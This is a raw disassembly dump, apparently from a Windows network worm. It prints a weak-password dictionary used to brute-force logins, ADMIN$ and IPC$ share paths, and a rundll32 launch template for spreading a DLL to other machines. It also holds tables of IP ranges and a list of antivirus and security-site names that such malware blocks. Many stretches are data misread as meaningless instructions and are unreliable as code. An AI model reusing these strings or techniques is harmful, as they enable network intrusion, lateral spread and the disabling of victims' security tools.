aQazwsx db 'qazwsx',0 ; DATA XREF: .text:009BA094�o
align 4
aQ1w2e3 db 'q1w2e3',0 ; DATA XREF: .text:009BA090�o
align 4
aQweasdzxc db 'qweasdzxc',0 ; DATA XREF: .text:009BA08C�o
align 10h
aAsdfgh db 'asdfgh',0 ; DATA XREF: .text:009BA088�o
align 4
aAsdzxc db 'asdzxc',0 ; DATA XREF: .text:009BA084�o
align 10h
aAsddsa db 'asddsa',0 ; DATA XREF: .text:009BA080�o
align 4
aAsdsa db 'asdsa',0 ; DATA XREF: .text:009BA07C�o
align 10h
aQweasd db 'qweasd',0 ; DATA XREF: .text:009BA078�o
align 4
aQwerty db 'qwerty',0 ; DATA XREF: .text:009BA074�o
align 10h
aQweewq db 'qweewq',0 ; DATA XREF: .text:009BA070�o
align 4
aQwewq db 'qwewq',0 ; DATA XREF: .text:009BA06C�o
align 10h
aNimda db 'nimda',0 ; DATA XREF: .text:009BA068�o
align 4
aAdministrator db 'administrator',0 ; DATA XREF: .text:009BA064�o
align 4
aAdmin db 'Admin',0 ; DATA XREF: .text:009BA060�o
align 10h
aAdmin_0 db 'admin',0 ; DATA XREF: .text:009BA05C�o
align 4
aA1b2c3 db 'a1b2c3',0 ; DATA XREF: .text:009BA058�o
align 10h
a1q2w3e db '1q2w3e',0 ; DATA XREF: .text:009BA054�o
align 4
a1234qwer db '1234qwer',0 ; DATA XREF: .text:009BA050�o
align 4
a1234abcd db '1234abcd',0 ; DATA XREF: .text:009BA04C�o
align 10h
a123asd db '123asd',0 ; DATA XREF: .text:009BA048�o
align 4
a123qwe db '123qwe',0 ; DATA XREF: .text:009BA044�o
align 10h
a123abc db '123abc',0 ; DATA XREF: .text:009BA040�o
align 4
a123321 db '123321',0 ; DATA XREF: .text:009BA03C�o
align 10h
a12321 db '12321',0 ; DATA XREF: .text:009BA038�o
align 4
a123123 db '123123',0 ; DATA XREF: .text:009BA034�o
align 10h
a1234567890 db '1234567890',0 ; DATA XREF: .text:009BA030�o
align 4
a123456789 db '123456789',0 ; DATA XREF: .text:009BA02C�o
align 4
a12345678 db '12345678',0 ; DATA XREF: .text:009BA028�o
align 4
a1234567 db '1234567',0 ; DATA XREF: .text:009BA024�o
a123456 db '123456',0 ; DATA XREF: .text:009BA020�o
align 4
a12345 db '12345',0 ; DATA XREF: .text:009BA01C�o
align 4
a1234 db '1234',0 ; DATA XREF: .text:009BA018�o
align 4
a123 db '123',0 ; DATA XREF: .text:009BA014�o
; wchar_t aSIpc
aSIpc: ; DATA XREF: sub_9A926F+12�o
; sub_9A92AE+13�o
unicode 0, <\\%s\IPC$>,0
; wchar_t Str
Str dw 0 ; DATA XREF: sub_9A92AE+54�o
; sub_9AE195+1F4�o
align 10h
; wchar_t aS
aS: ; DATA XREF: sub_9A9318+249�o
unicode 0, <\\%s>,0
align 4
; wchar_t aRundll32_exeSS
aRundll32_exeSS: ; DATA XREF: sub_9A9318+230�o
unicode 0, <rundll32.exe %s,%s>,0
align 4
; wchar_t aSAdminSystem32
aSAdminSystem32: ; DATA XREF: sub_9A9318+102�o
; sub_9A9318+118�o
unicode 0, <\\%s\ADMIN$\System32\%s>,0
; wchar_t Str2
Str2: ; DATA XREF: sub_9A9318+C2�o
; sub_9A9318+E7�o
unicode 0, <dll>,0
; wchar_t a_
a_: ; DATA XREF: sub_9A9318+8F�o
unicode 0, <.>,0
dword_9A2F60 dd 0C08956A1h, 11D11CD3h, 8000C5B1h, 0E27C15Fh ; DATA XREF: sub_9A9A64+8D�o
dword_9A2F70 dd 20404h, 0 ; DATA XREF: sub_9A9A64+3E�o
dd 0C0h, 46000000h
; IID rclsid
rclsid dd 5C63C1ADh ; Data1 ; DATA XREF: sub_9A9C0D+49�o
dw 3956h ; Data2
dw 4FF8h ; Data3
db 84h, 86h, 40h, 3, 47h, 58h, 31h, 5Bh; Data4
; IID riid
riid dd 0C08956B7h ; Data1 ; DATA XREF: sub_9A9C0D+41�o
dw 1CD3h ; Data2
dw 11D1h ; Data3
db 0B1h, 0C5h, 0, 80h, 5Fh, 0C1h, 27h, 0Eh; Data4
stru_9A2FA0 _msEH <0FFFFFFFFh, offset loc_9A9C7F, offset loc_9A9C83>
; DATA XREF: sub_9A9C0D+2�o
align 10h
dword_9A2FB0 dd 510CDD60h ; DATA XREF: sub_9A9DA6:loc_9A9DC3�r
dword_9A2FB4 dd 510CDD7Fh ; DATA XREF: sub_9A9DA6+25�r
db 0
db 68h, 0C7h, 5Bh
; ---------------------------------------------------------------------------
jmp fword ptr [eax-39h]
; ---------------------------------------------------------------------------
db 5Bh
db 0
db 0D1h, 58h, 0C0h
db 0FFh
db 0D1h, 58h, 0C0h
db 0
db 58h, 0F2h, 0CFh
db 0FFh
db 58h, 0F2h, 0CFh
db 0C0h ; À
db 2Bh, 2Ah, 0Ch
db 0C7h ; Ç
db 2Bh, 2Ah, 0Ch
db 0
db 0B5h, 84h, 43h
db 0FFh
db 0B5h, 84h, 43h
db 0
db 34h, 77h, 42h
db 0FFh
db 34h, 77h, 42h
db 0
db 0C4h, 17h, 0D0h
db 7Fh ;
db 0C4h, 17h, 0D0h
db 0
align 2
retf 0FF8Dh
; ---------------------------------------------------------------------------
db 0FFh, 0CAh, 8Dh
db 0
align 2
dw 8277h
db 0FFh
db 0FFh, 77h, 82h
db 0
align 2
dw 8A2Ah
db 0FFh
; ---------------------------------------------------------------------------
jmp fword ptr [edx]
; ---------------------------------------------------------------------------
db 8Ah
db 0
align 2
dw 82C8h
db 0FFh
db 0FFh, 0C8h, 82h
db 0
align 2
dw 9B23h
db 0FFh
; ---------------------------------------------------------------------------
jmp dword ptr [ebx]
; ---------------------------------------------------------------------------
db 9Bh
db 0
db 0A7h, 0A6h, 0CDh
; ---------------------------------------------------------------------------
jmp dword ptr [edi+3900CDA6h]
; ---------------------------------------------------------------------------
dw 0D0D4h
db 0FFh
db 39h, 0D4h, 0D0h
db 0
db 98h, 0D4h, 0D0h
db 0FFh
db 9Bh, 0D4h, 0D0h
db 0
db 40h, 0F2h, 0D0h
db 0FFh
db 41h, 0F2h, 0D0h
db 0
db 85h, 0F3h, 0D0h
db 1Fh
db 85h, 0F3h, 0D0h
db 80h ; €
db 0E7h, 0F5h, 0D0h
db 9Fh ; Ÿ
db 0E7h, 0F5h, 0D0h
aPAPASp?Sp? db 'ÀØAßØAÀ™p?Ï™p?',0
db 0DAh, 7Dh, 3Fh
db 0FFh
db 0DAh, 7Dh, 3Fh
db 80h ; €
db 3Dh, 0D2h, 41h
db 0BFh ; ¿
db 3Dh, 0D2h, 41h
db 40h ; @
db 2Dh, 0CEh, 41h
db 7Fh ;
; ---------------------------------------------------------------------------
sub eax, 0E0041CEh
test byte ptr [ecx-1], 0Eh
test byte ptr [ecx+0], 28h
jbe short loc_9A30BB
jmp fword ptr [ecx]
; ---------------------------------------------------------------------------
dw 3F76h
dd 3F763400h, 3F7637FFh, 41C8A5C8h, 41C8A5CFh, 0D0FD98D0h
dd 0D0FD98DFh, 0D0FFD858h, 0D0FFD85Fh, 0CEBC0E80h, 0CEBC0EBFh
dd 0CEBC0EC0h, 0CEBC0EFFh, 41D8F660h, 41D8F667h
byte_9A30B8 db 80h, 53h, 11h ; CODE XREF: .text:009A30EA�j
; ---------------------------------------------------------------------------
loc_9A30BB: ; CODE XREF: .text:009A307A�j
int 3 ; Trap to Debugger
loc_9A30BC: ; CODE XREF: .text:009A30EE�j
mov edi, 0CC1153h
mov dh, 0E8h
sar bh, 1
mov dh, 0E8h
rol byte ptr [eax-2F17A9h], 1
push edi
call near ptr 20A189A3h
dec eax
pop edi
pop es
and [eax-28h], cl
mov esi, 0BEDF45E1h
loope near ptr loc_9A3120+5
pusha
pop ss
out 45h, al
db 67h
pop ss
out 45h, al
pusha
pop ss
jbe short near ptr byte_9A30B8
jg short loc_9A3105
jbe short loc_9A30BC
add ah, dl
enter 0FFFFFF41h, 0D4h
enter 41h, 91h
; ---------------------------------------------------------------------------
dw 0C162h
; ---------------------------------------------------------------------------
call dword ptr [ecx-75EF3E9Eh]
pop ss
aam 1Fh
loc_9A3105: ; CODE XREF: .text:009A30EC�j
mov dl, [edi]
aam 48h
nop
out dx, eax
push eax
dec edi
nop
out dx, eax
push eax
call near ptr 0F06F314Dh
cmp [eax], al
aad 90h
imul eax, [eax], -2Bh
xchg eax, edi
imul eax, [eax], -2Bh
loc_9A3120: ; CODE XREF: .text:009A30DE�j
shr byte ptr ds:0B52CC70Ch[esi*4], 0Ch
mov al, 1Dh
mov eax, 0B81DBF0Ch
or al, 0
cmp byte ptr [ebx-447F0040h], 0C0h
add [eax-7F003F45h], al
mov ebx, 2417B0C0h
or al, 0BFh
pop ss
and al, 0Ch
add [esi], ah
cwde
or al, 7Fh
db 26h
cwde
or al, 30h
mov dword ptr [ecx], 29C73740h
inc eax
add [edi-6800BFD7h], dl
loc_9A315E: ; CODE XREF: .text:009A31D0�j
sub [eax-18h], eax
test al, 29h ; CODE XREF: .text:009A31D4�j
inc eax
out dx, eax
test al, 29h
inc eax
xor al, ch
pop es
sar byte ptr [edi], 1
call near ptr 461B0179h
bound eax, [ebx-61h]
inc ebp
bound eax, [ebx+40h]
dec eax
bound eax, [ebx+5Fh]
dec eax
bound eax, [ebx-60h]
xchg eax, ebp
pop edx
aas
mov edi, 3F5A95h
push eax
popa
inc ebx
call dword ptr [ecx+61h]
inc ebx
inc eax
adc eax, 157F41D8h
fadd dword ptr [ecx-70h]
cmp edx, esi
dec eax
xchg eax, edi
cmp edx, esi ; CODE XREF: .text:009A31C1�j
dec eax
and [eax+58h], ch ; CODE XREF: .text:009A31C5�j
inc esp
daa
push 0F2C04458h
mov [ebx-39h], ah
repne mov [ebx-28h], ah
push edx
pop ecx
inc esp
fist word ptr [edx+59h]
inc esp
add [ecx], al
push esp
fdivr st, st(7)
add [eax+ebx*8+48h], edx
jno short near ptr loc_9A319D+1
inc ebp
dec edi
jno short near ptr loc_9A31A0+2
inc ebp
adc byte ptr ds:3514874Bh[esi], 4Bh
jo short loc_9A315E
pop ebp
inc edx
ja short near ptr loc_9A3161+1
pop ebp
inc edx
rcl byte ptr [esi], 5Ch
inc edx
iret
; ---------------------------------------------------------------------------
db 16h, 5Ch, 42h
db 0A0h ;
db 0E8h, 41h, 3Fh
db 0AFh ; ¯
db 0E8h, 41h, 3Fh
db 90h
db 0E8h, 41h, 3Fh
db 97h ; —
db 0E8h, 41h, 3Fh
db 30h ; 0
db 3Ch, 48h, 44h
db 37h ; 7
db 3Ch, 48h, 44h
db 80h ; €
db 95h, 5Ah, 3Fh
db 9Fh ; Ÿ
db 95h, 5Ah, 3Fh
db 70h ; p
db 5Dh, 41h, 3Fh
db 7Fh ;
db 5Dh, 41h, 3Fh
db 0
db 5Eh, 41h, 3Fh
db 0Fh
aA?A?oA?A?A? db '^A?`^A?o^A?(ܼÐ/ܼÐÐ^A?ß^A?',0
db 46h, 8Fh, 0D8h
db 0FFh
db 47h, 8Fh, 0D8h
db 0B0h ; °
db 97h, 0E1h, 46h
db 0B7h ; ·
db 97h, 0E1h, 46h
db 0
align 2
dw 836Bh
db 0FFh
; ---------------------------------------------------------------------------
jmp fword ptr [ebx-7Dh]
; ---------------------------------------------------------------------------
db 0
db 5Ah, 5Ch, 0C0h
db 0FFh
db 5Ah, 5Ch, 0C0h
db 0
db 0E8h, 69h, 0C6h
db 0FFh
; ---------------------------------------------------------------------------
jmp short loc_9A32B8
; ---------------------------------------------------------------------------
db 0C6h
dd 0CCE73A00h, 0CCE73AFFh, 0CC8C4D00h, 0CC8C4DFFh, 0CC8C5000h
dd 0CC8C53FFh, 0C73C1C00h, 0C73C1CFFh, 0C7675A00h, 0C7675BFFh
dd 0C7677A00h, 0C7677AFFh, 0CC4F6500h, 0CC4F65FFh, 0C0ED4300h
dd 0C0ED43FFh, 0C6896100h, 0C68961FFh, 0CC4F8700h, 0CC4F87FFh
dd 0CC4FB300h, 0CC4FB3FFh, 0CC4FB400h, 0CC4FB5FFh, 0CC4FBC00h
dd 0CC4FBCFFh
; ---------------------------------------------------------------------------
loc_9A32B8: ; CODE XREF: .text:009A324D�j
add bl, al
dec edi
int 3 ; Trap to Debugger
inc ebp
dec edi
int 3 ; Trap to Debugger
add [esi+eax-39h], bl
call fword ptr [esi+6]
mov dword ptr [eax], 0FFCC4F07h
pop es
dec edi
int 3 ; Trap to Debugger
add [ebx], bl
dec edi
int 3 ; Trap to Debugger
call fword ptr [ebx]
dec edi
int 3 ; Trap to Debugger
add [edx-4Ch], cl
mov bh, 4Bh
mov ah, 0C6h
add [edi-4Ch], bl
mov bh, 61h
mov ah, 0C6h
add ah, ch
out 0CCh, eax ; DMA controller, 8237A-5.
; clear byte pointer flip-flop.
; ---------------------------------------------------------------------------
db 0FFh
db 0ECh, 0E7h, 0CCh
db 0
db 0Ah, 0F8h, 0CDh
db 0FFh
db 0Fh, 0F8h, 0CDh
db 0
db 3Fh, 0A3h, 0CDh
db 0FFh
db 3Fh, 0A3h, 0CDh
db 0
db 3Eh, 0A3h, 0CDh
db 0FFh
db 3Eh, 0A3h, 0CDh
db 0
align 2
dw 0CDA3h
db 0FFh
db 9Fh, 0A3h, 0CDh
db 0
db 29h, 0F8h, 0CDh
; ---------------------------------------------------------------------------
jmp fword ptr [ebx]
; ---------------------------------------------------------------------------
dw 0CDF8h
db 0
db 32h, 0F8h, 0CDh
db 0FFh
db 33h, 0F8h, 0CDh
db 0
db 3Dh, 0F8h, 0CDh
db 0FFh
db 3Fh, 0F8h, 0CDh
db 0
db 48h, 0F8h, 0CDh
db 0FFh
db 48h, 0F8h, 0CDh
db 0
db 0D4h, 0F8h, 0CDh
db 0FFh
db 0D7h, 0F8h, 0CDh
db 0
db 0E4h, 0F8h, 0CDh
; ---------------------------------------------------------------------------
jmp esp
; ---------------------------------------------------------------------------
dw 0CDF8h
db 0
db 0EBh, 0F8h, 0CDh
db 0FFh
db 0EBh, 0F8h, 0CDh
db 0
db 4Ch, 0E7h, 0CCh
db 0FFh
db 4Ch, 0E7h, 0CCh
db 0
db 0C0h, 0E7h, 0CCh
db 0FFh
db 0C0h, 0E7h, 0CCh
db 0
; ---------------------------------------------------------------------------
retn 0CCE7h
; ---------------------------------------------------------------------------
db 0FFh
db 0DFh, 0E7h, 0CCh
db 0
db 50h, 4Eh, 0CFh
db 0FFh
db 50h, 4Eh, 0CFh
db 0
db 51h, 4Eh, 0CFh
db 0FFh
db 51h, 4Eh, 0CFh
db 0
db 52h, 4Eh, 0CFh
db 0FFh
db 52h, 4Eh, 0CFh
db 0
db 0F3h, 0F8h, 0CDh
db 0FFh
db 0F4h, 0F8h, 0CDh
db 0
db 3, 75h, 0CFh
db 0FFh
db 3, 75h, 0CFh
db 0
db 75h, 12h, 0CFh
db 0FFh
db 75h, 12h, 0CFh
db 0
; ---------------------------------------------------------------------------
sbb ecx, [ebx-74E40030h]
rol byte ptr [eax], 1
aad 1Ch
sar edi, 1
aad 1Ch
rol dword ptr [eax], 1
inc esp
ror edi, 1
inc dword ptr [ecx+edx*8-31h]
add [eax+5Fh], ah
int 3 ; Trap to Debugger
jmp fword ptr [edi+5Fh]
; ---------------------------------------------------------------------------
align 10h
db 0C0h ; À
db 5Dh, 9Eh, 0CFh
db 0DFh ; ß
db 5Dh, 9Eh, 0CFh
db 0C0h ; À
db 7Bh, 0F0h, 0CFh
db 0DFh ; ß
db 7Bh, 0F0h, 0CFh
db 0
db 0CDh, 1Ah, 0D0h
db 0FFh
db 0CDh, 1Ah, 0D0h
db 0
db 9Dh, 0C5h, 0C0h
; ---------------------------------------------------------------------------
call fword ptr [ebp-18FF3F3Bh]
test ecx, esp
jmp edi
; ---------------------------------------------------------------------------
dw 0CC85h
db 0
db 60h, 48h, 0D8h
; ---------------------------------------------------------------------------
jmp dword ptr [ebx+48h]
; ---------------------------------------------------------------------------
db 0D8h
db 98h ; ˜
db 0A6h, 0E5h, 0CFh
db 9Fh ; Ÿ
db 0A6h, 0E5h, 0CFh
db 0
; ---------------------------------------------------------------------------
xchg eax, ebp
pop edi
int 3 ; Trap to Debugger
call dword ptr [ebp-2AB733A1h]
rcl cl, 4Fh
aad 0C0h
rol dword ptr [eax], 1
retf
; ---------------------------------------------------------------------------
dw 0CE49h
db 0FFh
; ---------------------------------------------------------------------------
retf
; ---------------------------------------------------------------------------
dw 0CE49h
db 0
db 76h, 49h, 0CEh
db 0FFh
db 76h, 49h, 0CEh
db 10h
db 36h, 2Dh, 0D0h
db 17h
db 36h, 2Dh, 0D0h
db 8
db 36h, 2Dh, 0D0h
db 0Fh
db 36h, 2Dh, 0D0h
db 0
db 1Fh, 49h, 0CEh
db 0FFh
db 1Fh, 49h, 0CEh
db 80h ; €
db 32h, 0A1h, 3Fh
db 0FFh
db 32h, 0A1h, 3Fh
db 0
db 32h, 0A1h, 3Fh
db 7Fh ;
db 32h, 0A1h, 3Fh
db 0E0h ; à
db 8, 0F0h, 0CFh
dword_9A3434 dd 0CFF008EFh, 9D360000h, 9D3CFFFFh, 0D02D59F8h, 0D02D59FFh
dd 0CEB64500h, 0CEB645FFh, 0CEB6F000h, 0CEB6F0FFh, 0CEB6F100h
dd 0CEB6F1FFh, 0CE494300h, 0CE4943FFh, 0CEB6FB00h, 0CEB6FBFFh
dd 0CEB6F700h, 0CEB6F7FFh, 0CEB6EC00h, 0CEB6ECFFh, 3FECC640h
dd 3FECC647h, 3FECC698h, 3FECC69Fh, 0A579FDE8h, 0A579FDEFh
dd 3FECAA40h, 3FECAA47h, 3FECBA40h, 3FECBA47h, 3FECBB68h
dd 3FECBB6Fh, 3FECBB80h, 3FECBB87h, 3FECBBA0h, 3FECBBA7h
dd 0C7028900h, 0C70289FFh, 0D8DE68E0h, 0D8DE68EFh, 3F975740h
dd 3F975747h, 404D5260h, 404D5267h, 404D5D50h, 404D5D5Fh
dd 41340000h, 4137FFFFh, 0CF2E0000h, 0CF2EFFFFh, 836B0000h
dd 836BFFFFh, 0CF448000h, 0CF44CFFFh, 0CCB69000h, 0CCB69FFFh
dd 0CE6B2200h, 0CE6B22FFh, 0CDF09E00h, 0CDF09FFFh, 0CC4FFC00h
dd 0CC4FFCFFh, 40C8D310h, 40C8D31Fh, 0CB2A300h, 0CB2A31Fh
dd 452C7E50h, 452C7E5Fh, 3FAD2A80h, 3FAD2AFFh, 0C1C6C00h
dd 0C1C6C7Fh, 41AA1D00h, 41AA1D07h, 43848560h, 43848567h
dd 806B000h, 806B0FFh, 0CDF85000h, 0CDF881FFh, 3F947BF0h
dd 3F947BF7h, 4029C100h, 4029C1FFh, 40554620h, 4055462Fh
dd 40555160h, 40555167h, 40555168h, 4055516Fh, 0D820A8E0h
dd 0D820A8FFh, 0CE4F4A20h, 0CE4F4A2Fh, 0D820AFE0h, 0D820AFFFh
dd 0D820B400h, 0D820B7FFh, 0D821E5E0h, 0D821E5FFh, 0D821EC00h
dd 0D821EFFFh, 0D821F000h, 0D821F3FFh, 0D820F000h, 0D820F3FFh
dd 0D8223300h, 0D82233FFh, 0D1017000h, 0D10170FFh, 0D1017100h
dd 0D10171FFh, 0D1010F00h, 0D1010FFFh, 0D82235B0h, 0D82235BFh
dd 0D82308E0h, 0D82308EFh, 0D1B98000h, 0D1B983FFh, 4172AF80h
dd 4172AF9Fh, 400FE560h, 400FE57Fh, 400FB100h, 400FB1FFh
dd 400FAAC0h, 400FAAC7h, 0D18FEE00h, 0D18FEEFFh, 400FB200h
dd 400FB2FFh, 4223D178h, 4223D17Fh, 4223D380h, 4223D3BFh
dd 4223D030h, 4223D03Fh, 0D8219400h, 0D82197FFh, 0D8234258h
dd 0D823425Fh, 0CE620A0h, 0CE620A7h, 0C357C00h, 0C357C1Fh
dd 0CE81260h, 0CE8127Fh, 0CBE9E00h, 0CBE9EFFh, 0C47C420h
dd 0C47C42Fh, 0D1F0C000h, 0D1F0DFFFh, 46250000h, 4625BFFFh
dd 0C3157C0h, 0C3157FFh, 4A5DCD90h, 4A5DCD97h, 4A5DCD98h
dd 4A5DCD9Fh, 4A5DCE40h, 4A5DCE47h, 46598B78h, 46598B7Fh
dd 0CE477700h, 0CE4777FFh, 0CE477500h, 0CE4775FFh, 0CE477600h
dd 0CE4776FFh, 0D19A9B70h, 0D19A9B77h, 41443E98h, 41443E9Fh
dd 4327D0A8h, 4327D0AFh, 41F24300h, 41F243FFh, 0CC47BF00h
dd 0CC47BFFFh, 3FC29B90h, 3FC29B97h, 428855C0h, 428855C7h
dd 407CB848h, 407CB84Fh, 0D8C8CE00h, 0D8C8CEFFh, 3F505D00h
dd 3F505D7Fh, 43C0E1D0h, 43C0E1DFh, 454AA200h, 454AA2FFh
dd 41DD0500h, 41DD05FFh, 4A5DCD90h, 4A5DCD97h, 4A5DCD98h
dd 4A5DCD9Fh, 4A5DCE40h, 4A5DCE47h, 46598B78h, 46598B7Fh
dd 41F85500h, 41F855FFh, 0C7F39DC0h, 0C7F39DDFh, 0C7F39D70h
dd 0C7F39D77h, 41C2D2E0h, 41C2D2FFh, 0D0C28B00h, 0D0C28BFFh
dd 0D0CC3180h, 0D0CC31FFh, 0D0CD1A00h, 0D0CD1AFFh, 0D0D9B800h
dd 0D0D9BBFFh, 0D0DEAC00h, 0D0DEACFFh, 0D0E0C840h, 0D0E0C85Fh
dd 0D0E56400h, 0D0E565FFh, 0D0F11300h, 0D0F1130Fh, 0D0F11310h
dd 0D0F1131Fh, 0D0F109E0h, 0D0F109EFh, 0D0F46C00h, 0D0F46C0Fh
dd 0D0F51000h, 0D0F5101Fh, 0D0F911A0h, 0D0F911AFh, 3F68D800h
dd 3F68D87Fh, 3F45F500h, 3F45F5FFh, 445A8D48h, 445A8D4Fh
dd 3FC67BA0h, 3FC67BA7h, 44F83040h, 44F83047h, 44F83048h
dd 44F8304Fh, 633108F8h, 633108FFh, 4126AC48h, 4126AC4Fh
dd 4126AC60h, 4126AC6Fh, 4B95AE10h, 4B95AE17h, 4B9764F0h
dd 4B9764FFh, 40510860h, 4051087Fh, 4370FF90h, 4370FF97h
dd 3FF0C9B0h, 3FF0C9BFh, 0CE10D1D0h, 0CE10D1DFh, 3FF0C3D0h
dd 3FF0C3DFh, 0CE10CC40h, 0CE10CC4Fh, 0CE10DF00h, 0CE10DFFFh
dd 3FF0D800h, 3FF0DBFFh, 3FF0DC00h, 3FF0DFFFh, 0CE10F618h
dd 0CE10F61Fh, 3FF0C3C0h, 3FF0C3CFh, 0CE10E0A0h, 0CE10E0BFh
dd 43C02730h, 43C0273Fh, 4820F0A0h, 4820F0AFh, 4820C998h
dd 4820C99Fh, 43275198h, 4327519Fh, 45147F20h, 45147F27h
dd 0D8341C00h, 0D8341CFFh, 462AE600h, 462AE7FFh, 3FFB6100h
dd 3FFB61FFh, 43788480h, 43788487h, 43788498h, 4378849Fh
dd 437884C0h, 437884CFh, 437884D0h, 437884DFh, 447B4F40h
dd 447B4F4Fh, 447B4F30h, 447B4F37h, 447B4F50h, 447B4F5Fh
dd 43762BE0h, 43762BE7h, 45E5D0E0h, 45E5D0E7h, 427A55C8h
dd 427A55CFh, 3FC91248h, 3FC9124Fh, 4B27F490h, 4B27F497h
dd 4B2071B8h, 4B2071BFh, 41DFC400h, 41DFC4FFh, 0D1F90B00h
dd 0D1F90B0Fh, 43C0DEC0h, 43C0DECFh, 407C4410h, 407C441Fh
dd 43C0A850h, 43C0A85Fh, 57EE3080h, 57EE308Fh, 42232000h
dd 42233FFFh, 42232D00h, 42232DFFh, 0C72BB900h, 0C72BC2FFh
dd 0C7557D00h, 0C7557FFFh, 0C6062000h, 0C6063FFFh, 0CCB26EE0h
dd 0CCB26EFFh, 0D80AC000h, 0D80ACFFFh, 41796D00h, 41796DFFh
dd 417D1D00h, 417D1D7Fh, 9B400000h, 9B40FFFFh, 0CECC0AC0h
dd 0CECC0ADFh, 0D8FA1000h, 0D8FA1FFFh, 0D82389A0h, 0D82389BFh
dd 0D8238980h, 0D823898Fh, 0D82389C0h, 0D82389FFh, 0C9B3AB0h
dd 0C9B3ABFh, 0D15A70B0h, 0D15A70BFh, 427F41B8h, 427F41BFh
dd 41431FB0h, 41431FB7h, 43625C00h, 43625CFFh, 4362DF00h
dd 4362DFFFh, 4158B200h, 4158B2FFh, 43634B00h, 43634BFFh
dd 43636900h, 4363691Fh, 41D3F300h, 41D3F37Fh, 4362E200h
dd 4362E2FFh, 0D88E0C00h, 0D88E0C1Fh, 41587E00h, 41587E1Fh
dd 415B9F60h, 415B9F7Fh, 415A2960h, 415A297Fh, 0CC109B20h
dd 0CC109B3Fh, 0D1BEE510h, 0D1BEE51Fh, 0D1B7EB90h, 0D1B7EB9Fh
dd 0D1B7F320h, 0D1B7F32Fh, 0D1B7C20Ch, 0D1B7C20Fh, 4799EF00h
dd 4799EF07h, 4B0AF2A8h, 4B0AF2AFh, 4B362FB0h, 4B362FB7h
dd 40AB7D80h, 40AB7D87h, 0D0C27400h, 0D0C274FFh, 0D0C29800h
dd 0D0C298FFh, 0D0D5F200h, 0D0D5F2FFh, 4B0A4040h, 4B0A405Fh
dd 41DEC000h, 41DEC0FFh, 628177A0h, 628177A7h, 424D8200h
dd 424D8207h, 0D556AC80h, 0D556AC9Fh, 0D5F40A40h, 0D5F40A4Fh
dd 48ECA780h, 48ECA79Fh, 403AB000h, 403AB0FFh, 0CAB9A90h
dd 0CAB9A97h, 0D86F6C60h, 0D86F6C7Fh, 0CDA85560h, 0CDA8557Fh
dd 3F97E940h, 3F97E95Fh, 3F95E4A0h, 3F95E4BFh, 3F95EE40h
dd 3F95EE5Fh, 3F91F420h, 3F91F43Fh, 417AF100h, 417AF11Fh
dd 42B45000h, 42B45FFFh, 0D8638000h, 0D8638FFFh, 0D8680000h
dd 0D8681FFFh, 447EF7F8h, 447EF7FFh, 43420C80h, 43420C87h
dd 40511080h, 4051109Fh, 9BD4F140h, 9BD4F147h, 9BD4E5C0h
dd 9BD4E5DFh, 0D8291B08h, 0D8291B0Fh, 4AD38940h, 4AD3895Fh
dd 4AD388A0h, 4AD388A7h, 4569B538h, 4569B53Fh, 428C29C0h
dd 428C29C7h, 478A70C0h, 478A70DFh, 3FCBCA08h, 3FCBCA0Fh
dd 45E20470h, 45E2047Fh, 4B0BFB80h, 4B0BFB9Fh, 4CE34298h
dd 4CE3429Fh, 4CF9A800h, 4CF9A807h, 63929FC0h, 63929FC7h
dd 43729888h, 4372988Fh, 41D09D10h, 41D09D1Fh, 41D6AC00h
dd 41D6ACFFh, 437F4D00h, 437F4D0Fh, 74726563h, 2Eh, 736E6173h
dd 2Eh, 39746962h, 2Eh, 2E746576h, 0
dword_9A3C30 dd 2E677661h, 0 ; DATA XREF: .text:009BA4D4�o
dword_9A3C38 dd 2E707661h, 0 ; DATA XREF: .text:009BA4D0�o
dword_9A3C40 dd 2E6163h ; DATA XREF: .text:009BA4CC�o
dword_9A3C44 dd 2E69616Eh, 0 ; DATA XREF: .text:009BA4C8�o
aWindowsupdate db 'windowsupdate',0 ; DATA XREF: .text:009BA4C4�o
align 4
aWilderssecurit db 'wilderssecurity',0 ; DATA XREF: .text:009BA4C0�o
aThreatexpert db 'threatexpert',0 ; DATA XREF: .text:009BA4BC�o
align 4
aCastlecops db 'castlecops',0 ; DATA XREF: .text:009BA4B8�o
align 4
aSpamhaus db 'spamhaus',0 ; DATA XREF: .text:009BA4B4�o
align 4
aCpsecure db 'cpsecure',0 ; DATA XREF: .text:009BA4B0�o
align 10h
aArcabit db 'arcabit',0 ; DATA XREF: .text:009BA4AC�o
aEmsisoft db 'emsisoft',0 ; DATA XREF: .text:009BA4A8�o
align 4
aSunbelt db 'sunbelt',0 ; DATA XREF: .text:009BA4A4�o
aSecurecomputin db 'securecomputing',0 ; DATA XREF: .text:009BA4A0�o
aRising db 'rising',0 ; DATA XREF: .text:009BA49C�o
align 4
aPrevx db 'prevx',0 ; DATA XREF: .text:009BA498�o
align 4
aPctools db 'pctools',0 ; DATA XREF: .text:009BA494�o
aNorman db 'norman',0 ; DATA XREF: .text:009BA490�o
align 4
aK7computing db 'k7computing',0 ; DATA XREF: .text:009BA48C�o
aIkarus db 'ikarus',0 ; DATA XREF: .text:009BA488�o
align 10h
aHauri db 'hauri',0 ; DATA XREF: .text:009BA484�o
align 4
aHacksoft db 'hacksoft',0 ; DATA XREF: .text:009BA480�o
align 4
aGdata db 'gdata',0 ; DATA XREF: .text:009BA47C�o
align 4
aFortinet db 'fortinet',0 ; DATA XREF: .text:009BA478�o
align 4
aEwido db 'ewido',0 ; DATA XREF: .text:009BA474�o
align 10h
aClamav db 'clamav',0 ; DATA XREF: .text:009BA470�o
align 4
aComodo db 'comodo',0 ; DATA XREF: .text:009BA46C�o
align 10h
aQuickheal db 'quickheal',0 ; DATA XREF: .text:009BA468�o
align 4
aAvira db 'avira',0 ; DATA XREF: .text:009BA464�o
align 4
aAvast db 'avast',0 ; DATA XREF: .text:009BA460�o
align 4
aEsafe db 'esafe',0 ; DATA XREF: .text:009BA45C�o
align 4
aAhnlab db 'ahnlab',0 ; DATA XREF: .text:009BA458�o
align 4
aCentralcommand db 'centralcommand',0 ; DATA XREF: .text:009BA454�o
align 4
aDrweb db 'drweb',0 ; DATA XREF: .text:009BA450�o
align 4
aGrisoft db 'grisoft',0 ; DATA XREF: .text:009BA44C�o
aEset db 'eset',0 ; DATA XREF: .text:009BA448�o
align 4
aNod32 db 'nod32',0 ; DATA XREF: .text:009BA444�o
align 4
aFProt db 'f-prot',0 ; DATA XREF: .text:009BA440�o
align 4
aJotti db 'jotti',0 ; DATA XREF: .text:009BA43C�o
align 4
aKaspersky db 'kaspersky',0 ; DATA XREF: .text:009BA438�o
align 4
aFSecure db 'f-secure',0 ; DATA XREF: .text:009BA434�o
